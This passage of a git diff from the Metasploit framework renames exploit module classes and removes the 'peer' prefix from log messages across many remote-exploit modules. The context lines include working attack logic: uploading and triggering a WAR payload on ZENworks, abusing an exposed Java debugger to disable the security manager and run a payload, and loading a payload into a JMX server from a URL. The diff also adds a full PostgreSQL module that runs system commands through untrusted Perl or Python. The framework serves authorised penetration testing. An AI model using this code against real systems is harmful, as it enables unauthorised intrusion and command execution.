'method' => 'POST', 'uri' => normalize_uri("#{base}/work/resultimage.php"), @@ -115,18 +115,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end @target_path = normalize_uri("#{base}/results/#{fname}") - print_status("#{peer} - Requesting #{@target_path}") + print_status("Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 - print_error("#{peer} - Payload failed to upload") + print_error("Payload failed to upload") end end end diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index 4ec74e7e02..10ebc7548f 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 71c2f8d6eb..6c5bc618a3 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -209,13 +209,13 @@ class Metasploit3 < Msf::Exploit::Remote @base = normalize_uri(target_uri.path) @base << '/' if @base[-1, 1] != '/' - print_status("#{peer} - Getting cookie") + print_status("Getting cookie") cookie = get_cookie - print_status("#{peer} - Logging in") + print_status("Logging in") cred = login(cookie) - print_status("#{peer} - Triggering spam logging") + print_status("Triggering spam logging") inject_exec(cred) handler diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index 4bbe7f9e23..ef9c0d12c8 100644 --- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index de4afd7a6a..f30690cf58 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zemra_panel_rce.rb b/modules/exploits/multi/http/zemra_panel_rce.rb index 57fdaadb76..5f6fb39320 100644 --- a/modules/exploits/multi/http/zemra_panel_rce.rb +++ b/modules/exploits/multi/http/zemra_panel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index f58aa5b783..5bba09e754 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file to #{tomcat_path}") + print_status("Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else - print_error("#{peer} - Failed to upload, try again with a different path?") + print_error("Failed to upload, try again with a different path?") return false end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote Rex.sleep(2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index f82eb98b9a..0abf38123e 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 9fa8a71709..18fe64bc64 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/php_exe' require 'nokogiri' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/ids/snort_dce_rpc.rb b/modules/exploits/multi/ids/snort_dce_rpc.rb index 04491e6dc0..75656d28c7 100644 --- a/modules/exploits/multi/ids/snort_dce_rpc.rb +++ b/modules/exploits/multi/ids/snort_dce_rpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Capture diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb index 5f709764b8..7e0ddefcb7 100644 --- a/modules/exploits/multi/misc/arkeia_agent_exec.rb +++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/batik_svg_java.rb b/modules/exploits/multi/misc/batik_svg_java.rb index e1b3ec975e..86db120167 100644 --- a/modules/exploits/multi/misc/batik_svg_java.rb +++ b/modules/exploits/multi/misc/batik_svg_java.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index c6861a0ea3..88087b8139 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote if fingerprint =~ /Data Protector A\.(\d+\.\d+)/ version = $1 - vprint_status("#{peer} - Windows / HP Data Protector version #{version} found") + vprint_status("Windows / HP Data Protector version #{version} found") elsif fingerprint =~ / INET/ - vprint_status("#{peer} - Linux / HP Data Protector found") + vprint_status("Linux / HP Data Protector found") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -106,25 +106,25 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_exec = rand_text_alpha(8) - print_status("#{peer} - Leaking the HP Data Protector directory...") + print_status("Leaking the HP Data Protector directory...") leak = leak_hp_directory(rand_exec) dir = parse_dir(leak, rand_exec) if dir.nil? dir = default_hp_dir - print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}") + print_error("HP Data Protector dir not found, using the default #{dir}") else unless valid_target?(dir) - print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") + print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") end end if target.name =~ /Windows/ #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true}) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_windows(payload.encoded, dir) else - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_linux(payload.encoded, dir) end end @@ -265,10 +265,10 @@ class Metasploit3 < Msf::Exploit::Remote def parse_dir(data, clue) if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") else dir = nil end diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index 01ea41fc06..5161aa9cc8 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index ecb6560c47..99f3775b53 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 3bd4d88285..412626afd9 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| if var != 0 && var % 1000 == 0 - vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + vprint_status("Parsed #{var} classes of #{nb_entries}") end data = {} @@ -691,13 +691,13 @@ class Metasploit3 < Msf::Exploit::Remote path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" if @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Linux target...") + print_warning("#{@os} system detected but using Linux target...") end when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" unless @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Windows target...") + print_warning("#{@os} system detected but using Windows target...") end end @@ -837,7 +837,7 @@ class Metasploit3 < Msf::Exploit::Remote # 2. Suspend the VM before setting the event suspend_vm - vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}") + vprint_status("Setting 'step into' event in thread: #{t_id}") step_info = format(@vars["objectid_size"], t_id) step_info << [STEP_MIN].pack('N') step_info << [STEP_INTO].pack('N') @@ -868,13 +868,13 @@ class Metasploit3 < Msf::Exploit::Remote value = get_value(sys_class["reftype_id"], sec_field) if(value == 0) - print_good("#{peer} - Security manager was not set") + print_good("Security manager was not set") else set_value(sys_class["reftype_id"], sec_field, 0) if get_value(sys_class["reftype_id"], sec_field) == 0 - print_good("#{peer} - Security manager has been disabled") + print_good("Security manager has been disabled") else - print_good("#{peer} - Security manager has not been disabled, trying anyway...") + print_good("Security manager has not been disabled, trying anyway...") end end end @@ -884,7 +884,7 @@ class Metasploit3 < Msf::Exploit::Remote # 0. Fingerprinting OS fingerprint_os(thread_id) - vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") + vprint_status("Executing payload on \"#{@os}\", target version: #{version}") # 1. Prepares the payload payload_exe, pl_exe = setup_payload @@ -927,27 +927,27 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end - print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...") + print_status("Retrieving the sizes of variable sized data types in the target VM...") get_sizes - print_status("#{peer} - Getting the version of the target VM...") + print_status("Getting the version of the target VM...") get_version - print_status("#{peer} - Getting all currently loaded classes by the target VM...") + print_status("Getting all currently loaded classes by the target VM...") get_all_classes - print_status("#{peer} - Getting all running threads in the target VM...") + print_status("Getting all running threads in the target VM...") get_all_threads - print_status("#{peer} - Setting 'step into' event...") + print_status("Setting 'step into' event...") r_id, t_id = set_step_event - print_status("#{peer} - Resuming VM and waiting for an event...") + print_status("Resuming VM and waiting for an event...") response = resume_vm unless parse_event(response, r_id, t_id) datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...") + print_status("Received #{i + 1} responses that are not a 'step into' event...") buf = read_reply break if parse_event(buf, r_id, t_id) @@ -957,14 +957,14 @@ class Metasploit3 < Msf::Exploit::Remote end end - vprint_status("#{peer} - Received matching event from thread #{t_id}") - print_status("#{peer} - Deleting step event...") + vprint_status("Received matching event from thread #{t_id}") + print_status("Deleting step event...") clear_event(EVENT_STEP, r_id) - print_status("#{peer} - Disabling security manager if set...") + print_status("Disabling security manager if set...") disable_sec_manager - print_status("#{peer} - Dropping and executing payload...") + print_status("Dropping and executing payload...") exec_payload(t_id) disconnect diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index d5221281f4..b5149373ed 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer @@ -131,18 +131,18 @@ class Metasploit3 < Msf::Exploit::Remote @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") end - print_status("#{peer} - Discovering the JMXRMI endpoint...") + print_status("Discovering the JMXRMI endpoint...") mbean_server = discover_endpoint disconnect if mbean_server.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") else - print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") end # First try to connect to the original RHOST, since the mbean address may be inaccessible @@ -157,20 +157,20 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") end - print_status("#{peer} - Proceeding with handshake...") + print_status("Proceeding with handshake...") jmx_endpoint = handshake(mbean_server) if jmx_endpoint.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") else - print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") end - print_status("#{peer} - Loading payload...") + print_status("Loading payload...") unless load_payload(jmx_endpoint) fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_jmx_invoke( object_number: jmx_endpoint[:object_number], uid_number: jmx_endpoint[:uid].number, @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote return nil if ref.nil? unless ref[:object] == 'javax.management.remote.rmi.RMIServerImpl_Stub' - vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{ref[:object]}") + vprint_error("JMXRMI discovery returned unexpected object #{ref[:object]}") return nil end @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote ref = send_new_client(opts) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - JMXRMI discovery raised an exception of type #{e.message}") + vprint_error("JMXRMI discovery raised an exception of type #{e.message}") return nil end @@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload(conn_stub) - vprint_status("#{peer} - Getting JMXPayload instance...") + vprint_status("Getting JMXPayload instance...") begin res = send_jmx_get_object_instance( @@ -244,10 +244,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceNotFoundException' - vprint_warning("#{peer} - JMXPayload instance not found, trying to load") + vprint_warning("JMXPayload instance not found, trying to load") return load_payload_from_url(conn_stub) else - vprint_error("#{peer} - getObjectInstance returned unexpected exception #{e.message}") + vprint_error("getObjectInstance returned unexpected exception #{e.message}") return false end end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload_from_url(conn_stub) - vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...") + vprint_status("Creating javax.management.loading.MLet MBean...") begin res = send_jmx_create_mbean( @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceAlreadyExistsException' - vprint_good("#{peer} - javax.management.loading.MLet already exists") + vprint_good("javax.management.loading.MLet already exists") res = true when 'java.lang.SecurityException' - vprint_error("#{peer} - The provided user hasn't enough privileges") + vprint_error(" The provided user hasn't enough privileges") res = nil else - vprint_error("#{peer} - createMBean raised unexpected exception #{e.message}") + vprint_error("createMBean raised unexpected exception #{e.message}") res = nil end end if res.nil? - vprint_error("#{peer} - The request to createMBean failed") + vprint_error("The request to createMBean failed") return false end - vprint_status("#{peer} - Getting javax.management.loading.MLet instance...") + vprint_status("Getting javax.management.loading.MLet instance...") begin res = send_jmx_get_object_instance( object_number: conn_stub[:object_number], @@ -298,16 +298,16 @@ class Metasploit3 < Msf::Exploit::Remote name: 'DefaultDomain:type=MLet' ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - getObjectInstance returned unexpected exception: #{e.message}") + vprint_error("getObjectInstance returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The request to GetObjectInstance failed") + vprint_error("The request to GetObjectInstance failed") return false end - vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") + vprint_status("Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") begin res = send_jmx_invoke( @@ -320,12 +320,12 @@ class Metasploit3 < Msf::Exploit::Remote args: { 'java.lang.String' => "#{get_uri}/mlet" } ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - invoke() returned unexpected exception: #{e.message}") + vprint_error("invoke() returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The call to getMBeansFromURL failed") + vprint_error("The call to getMBeansFromURL failed") return false end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 3dae8dad96..6a5942c984 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Java::Rmi::Client @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") send_header ack = recv_protocol_ack if ack.nil? @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote jar = rand_text_alpha(rand(8)+1) + '.jar' new_url = get_uri + '/' + jar - print_status("#{peer} - Sending RMI Call...") + print_status("Sending RMI Call...") dgc_interface_hash = calculate_interface_hash( [ { diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index ab1dd0e15b..fe8127cd92 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index c15c193ead..1c27b58489 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index 1dab5491c3..26465c6334 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb index 501df43124..d2bca2ffd0 100644 --- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb +++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index ed53e0b7f2..6307eda55d 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index b20a74ef78..4882496650 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/w3tw0rk_exec.rb b/modules/exploits/multi/misc/w3tw0rk_exec.rb index 9681bb3da0..3691b10e28 100644 --- a/modules/exploits/multi/misc/w3tw0rk_exec.rb +++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index ee804483e5..b481303f09 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 18db711cc3..6b0159a527 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/xdh_x_exec.rb b/modules/exploits/multi/misc/xdh_x_exec.rb index 8e3c0fda70..129fe038fc 100644 --- a/modules/exploits/multi/misc/xdh_x_exec.rb +++ b/modules/exploits/multi/misc/xdh_x_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index a433889c5e..2a361b807f 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 5b0e336fc0..6f5190ac45 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index a6883a67ca..c609ef77bf 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb new file mode 100644 index 0000000000..2d4d1c611d --- /dev/null +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -0,0 +1,208 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/postgres' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Postgres + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q( + Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. + Most commonly this is Perl and Python. When enabled, command execution is possible on the host. + To execute system commands, loading the "untrusted" version of the language is necessary. + This requires a superuser. This is usually postgres. The execution should be platform-agnostic, + and has been tested on OS X, Windows, and Linux. + + This module attempts to load Perl or Python to execute system commands. As this dynamically loads + a scripting language to execute commands, it is not necessary to drop a file on the filesystem. + + Only Postgres 8 and up are supported. + ), + 'Author' => [ + 'Micheal Cottingham', # author of this module + 'midnitesnake', # the postgres_payload module that this is based on, + 'Nixawk' # Improves the module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] + ], + 'Platform' => %w(linux unix win osx), + 'Payload' => { + 'PayloadType' => %w(cmd) + }, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 1 2016')) + + deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') + end + + def postgres_major_version(version) + version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/) + version_match['major_version'] + end + + def check + if vuln_version? + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def vuln_version? + version = postgres_fingerprint + if version[:auth] + major_version = postgres_major_version(version[:auth]) + return true if major_version && major_version.to_i >= 8 + end + false + end + + def login_success? + status = do_login(username, password, database) + case status + when :noauth + print_error "#{peer} - Authentication failed" + return false + when :noconn + print_error "#{peer} - Connection failed" + return false + else + print_status "#{peer} - #{status}" + return true + end + end + + def load_extension?(language) + case load_procedural_language(language, 'LANGUAGE') + when :exists + print_good "#{peer} - #{language} is already loaded, continuing" + return true + when :loaded + print_good "#{peer} - #{language} was successfully loaded, continuing" + return true + when :not_exists + print_status "#{peer} - #{language} could not be loaded" + return false + else + print_error "#{peer} - error occurred loading #{language}" + return false + end + end + + def exec_function?(func_name) + query = "SELECT 